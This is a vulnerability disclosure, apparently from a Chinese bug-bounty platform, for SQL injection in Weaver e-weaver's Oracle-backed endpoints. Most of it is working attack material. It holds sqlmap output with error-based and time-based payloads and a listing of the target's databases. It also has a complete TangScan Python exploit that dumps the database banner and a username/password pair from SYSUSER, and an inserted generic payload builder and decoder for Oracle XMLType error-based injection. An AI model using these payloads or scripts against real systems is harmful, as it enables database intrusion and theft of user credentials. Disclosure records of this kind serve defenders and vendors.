2015-09-12: Details sent to the vendor; awaiting vendor handling
2015-09-14: Vendor confirmed the issue; details visible to the vendor only
2015-09-17: Details opened to third-party security partners (绿盟科技/NSFOCUS, 唐朝安全巡航)
2015-11-08: Details opened to core white hats and domain experts
2015-11-18: Details opened to regular white hats
2015-11-28: Details opened to intern white hats
2015-12-13: Details made public
Going through the product's files one by one is too tedious, so three injection points on the vendor's own site serve as examples.

Location 1: vulnerable file /mobile/plugin/loadWfGraph.jsp
http://**.**.**.**:9085/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1*
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: http://**.**.**.**:9085/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' AND 3708=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(113)||CHR(116)||CHR(113)||(SELECT (CASE WHEN (3708=3708) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(109)||CHR(122)||CHR(111)||CHR(113)||CHR(62))) FROM DUAL) AND 'IhpV'='IhpV

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://**.**.**.**:9085/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' AND 5058=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(121)||CHR(68)||CHR(104),5) AND 'IXww'='IXww
---
[16:30:43] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
Databases:

available databases [37]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EWEAVER
[*] EWEAVER5TEST
[*] EWEAVERINHOUSE
[*] EWEAVERTEST
[*] EXFSYS
[*] FTOA01
[*] FTPOM
[*] HR
[*] HTF
[*] IX
[*] MDSYS
[*] MOBILEDEMO
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] PMECOLOGY
[*] POWER
[*] POWER01
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEAVERIM
[*] WFPM
[*] WMSYS
[*] XDB
[*] ZTDBA
[*] ZTKG
[*] ZZB
[*] ZZBMIS3
Location 2:
http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 109 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1' AND 2569=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(101)||CHR(116)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (2569=2569) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(117)||CHR(119)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND 'noSD'='noSD

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1' AND 6418=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(72)||CHR(65)||CHR(108),5) AND 'mcMO'='mcMO
---
Location 3:
http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2*

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 53 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2' AND 9830=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(100)||CHR(97)||CHR(104)||CHR(113)||(SELECT (CASE WHEN (9830=9830) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(111)||CHR(109)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'ByUc'='ByUc

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2' AND 3045=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(82)||CHR(119)||CHR(114),5) AND 'dOdb'='dOdb
---
[16:37:44] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
Verifying targets one at a time is too slow, so the following TangScan script automates the check (verify pulls the database banner, exploit pulls one username/password pair from SYSUSER):
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2013-2014 TangScan developers (http://**.**.**.**/)
See the file 'docs/COPYING' for copying permission

author: 浮萍 <fate0@**.**.**.**>
"""

import re

from thirdparty import requests
from modules.exploit import TSExploit

__all__ = ['TangScan']


class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            "name": "Weaver e-weaver SQL injection detection 1",
            "product": "weaver",
            "product_version": "",
            "desc": "",
            "license": self.license.TS,
            "author": "浮萍",
            "ref": [
                {self.ref.wooyun: "**.**.**.**"},
            ],
            "type": self.type.injection,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "",
            "create_date": "",
        }

        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "target URL"
            }
        })

        self.register_result({
            "status": False,
            "data": {
                "user_info": {
                    "username": "",
                    "password": ""
                },
                "db_info": {
                    "version": "",
                }
            },
            "description": "",
            "error": ""
        })

    def verify(self):
        self.print_debug("verify start")

        # The leaked value is wrapped in the marker 'qaflq'
        # (CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)) inside the XMLType error text.
        re_version_pattern = re.compile(r'qaflq(.+?)qaflq', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        cookies = {'cookie': 'admin'}
        # Error-based XMLType payload: leaks the first row of v$version. Spaces, '$', '@' and '#'
        # are REPLACE()d with letter-only tokens so they survive the XML QName error message.
        # (The closing CHR(62) was missing in the originally posted version and is restored here.)
        exp_url = ("{domain}/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' AND 9945=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(Banner AS VARCHAR(4000)),CHR(32)) FROM v$version WHERE rownum = 1),CHR(32),CHR(113)||CHR(117)||CHR(113)),CHR(36),CHR(113)||CHR(115)||CHR(113)),CHR(64),CHR(113)||CHR(117)||CHR(113)),CHR(35),CHR(113)||CHR(111)||CHR(113)))||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||CHR(62))) FROM DUAL) AND 'jsWv'='jsWv".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return

        re_result = re_version_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return

        self.result.status = True
        ls_result = re_result[0]
        ls_result = ls_result.replace('quq', ' ')  # undo REPLACE(CHR(32), 'quq') from the payload
        self.result.data.db_info.version = ls_result
        self.result.description = "Target {url} has SQL injection; database version: {db_version}".format(
            url=self.option.url,
            db_version=ls_result
        )

    def exploit(self):
        self.print_debug("exploit start")

        # username and password are joined with 'quq' (CHR(113)||CHR(117)||CHR(113)) in the payload.
        # The originally posted pattern used '\quq'; '\q' is not a valid regex escape, so it is written plainly here.
        re_userinfo_pattern = re.compile(r'qaflq(\w+?)quq(\w+?)qaflq', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        cookies = {'cookie': 'admin'}
        exp_url = ("{domain}/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' AND 2341=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(concat(LONGONNAME||CHR(113)||CHR(117)||CHR(113),LOGONPASS) AS VARCHAR(4000)),CHR(32)) FROM SYSUSER WHERE rownum = 1),CHR(32),CHR(113)||CHR(117)||CHR(113)),CHR(36),CHR(113)||CHR(115)||CHR(113)),CHR(64),CHR(113)||CHR(117)||CHR(113)),CHR(35),CHR(113)||CHR(111)||CHR(113)))||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||CHR(62))) FROM DUAL) AND 'tJNI'='tJNI".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return

        re_result = re_userinfo_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return

        self.result.status = True
        self.result.data.user_info.username = re_result[0][0]
        self.result.data.user_info.password = re_result[0][1]
        self.result.description = "Target {url} has SQL injection; one user: {username}, password: {password}".format(
            url=self.option.url,
            username=self.result.data.user_info.username,
            password=self.result.data.user_info.password
        )


if __name__ == '__main__':
    from modules.main import main
    main(TangScan())
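The script above hard-codes one payload per query. As an added example (my code, not the report's and not part of TangScan), the following Python generalizes the same Oracle XMLType error-based technique: it builds the injected value for any scalar subquery, renders the marker and the QName-unsafe characters as CHR() chains so no quote characters are needed, and decodes the leaked value from the error text. The marker string, the tag number, the closing string, the sample error page and the separate token for '@' are all assumptions of this example.

```python
import re

# Boundary marker around the leaked value; the report's payloads spell it as
# CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113).
MARKER = "qaflq"

# Characters that break the XML QName (and so truncate the LPX-00110 error text)
# are swapped for letter-only tokens inside the database and swapped back here.
# The report maps both ' ' and '@' to 'quq'; this example gives '@' its own
# token 'qaq' (an assumption, not the report's encoding) so decoding is unambiguous.
ENCODING = [(" ", "quq"), ("$", "qsq"), ("@", "qaq"), ("#", "qoq")]

# Constructed sample of the Oracle error text a vulnerable page echoes back
# (not captured from a real target).
SAMPLE_ERROR_PAGE = (
    "ORA-31011: XML parsing failed\n"
    "ORA-19202: Error occurred in XML processing\n"
    "LPX-00110: Warning: invalid QName \":qaflqOraclequqDatabasequq11gquq"
    "EnterprisequqEditionquqReleasequq11.2.0.1.0quq-quq64bitquqProductionqaflq\""
)


def chr_chain(text):
    """Render text as an Oracle CHR() concatenation, so the payload carries no quotes."""
    return "||".join("CHR(%d)" % ord(c) for c in text)


def encode_expr(scalar_subquery):
    """Wrap a scalar subquery in the nested REPLACE() calls that make its value QName-safe."""
    expr = "(%s)" % scalar_subquery
    for ch, token in ENCODING:
        expr = "REPLACE(%s,%s,%s)" % (expr, chr_chain(ch), chr_chain(token))
    return expr


def xmltype_payload(param_value, scalar_subquery, tag=3708, closer="abcd"):
    """Build the injected parameter value:
    <value>' AND <tag>=(SELECT UPPER(XMLType('<:' || MARKER || leak || MARKER || '>')) FROM DUAL) AND '<c>'='<c>
    XMLType() fails on the invalid QName and Oracle reports the whole name, leaking the value."""
    xml = "%s||(%s)||%s" % (
        chr_chain("<:" + MARKER),
        encode_expr(scalar_subquery),
        chr_chain(MARKER + ">"),
    )
    return "%s' AND %d=(SELECT UPPER(XMLType(%s)) FROM DUAL) AND '%s'='%s" % (
        param_value, tag, xml, closer, closer)


def encode_value(text):
    """Python-side mirror of the REPLACE() chain, handy for building test fixtures."""
    for ch, token in ENCODING:
        text = text.replace(ch, token)
    return text


def decode_leak(body):
    """Extract the value between the markers in an error page and undo the encoding.
    Returns None when no marker pair is present (target not vulnerable or errors suppressed)."""
    m = re.search(re.escape(MARKER) + r"(.+?)" + re.escape(MARKER), body, re.DOTALL)
    if m is None:
        return None
    value = m.group(1)
    for ch, token in ENCODING:
        value = value.replace(token, ch)
    return value


def banner_subquery():
    """The report's first-row v$version query, as the scalar subquery to leak."""
    return "SELECT NVL(CAST(Banner AS VARCHAR(4000)),CHR(32)) FROM v$version WHERE rownum = 1"


if __name__ == "__main__":
    print("requestid=" + xmltype_payload("1", banner_subquery()))
    print(decode_leak(SAMPLE_ERROR_PAGE))
```

Because the report's own encoding sends both a space and '@' to 'quq', its script turns any '@' in a leaked value back into a space; the separate 'qaq' token above avoids that collision. The decoder returns None rather than an empty string when the marker is absent, which is the case to treat as "not vulnerable" when scanning.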
Locations 2 and 3 work the same way; only exp_url needs to change.

Case 1: http://**.**.**.**
Case 2: http://**.**.**.**/
Case 3: http://**.**.**.**
The PoC may have a small problem: it errors out when retrieving the username and password.
http://**.**.**.**//mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' AND 2341=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(concat(LONGONNAME||CHR(113)||CHR(117)||CHR(113),LOGONPASS) AS VARCHAR(4000)),CHR(32)) FROM SYSUSER WHERE rownum = 1),CHR(32),CHR(113)||CHR(117)||CHR(113)),CHR(36),CHR(113)||CHR(115)||CHR(113)),CHR(64),CHR(113)||CHR(117)||CHR(113)),CHR(35),CHR(113)||CHR(111)||CHR(113)))||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||CHR(62))) FROM DUAL) AND 'tJNI'='tJNI#
(Ignore the garbled characters.)
Severity: High
Vulnerability Rank: 13
Confirmed: 2015-09-14 23:05
CNVD has confirmed the reported issue and notified the software vendor through its established handling channels.
None yet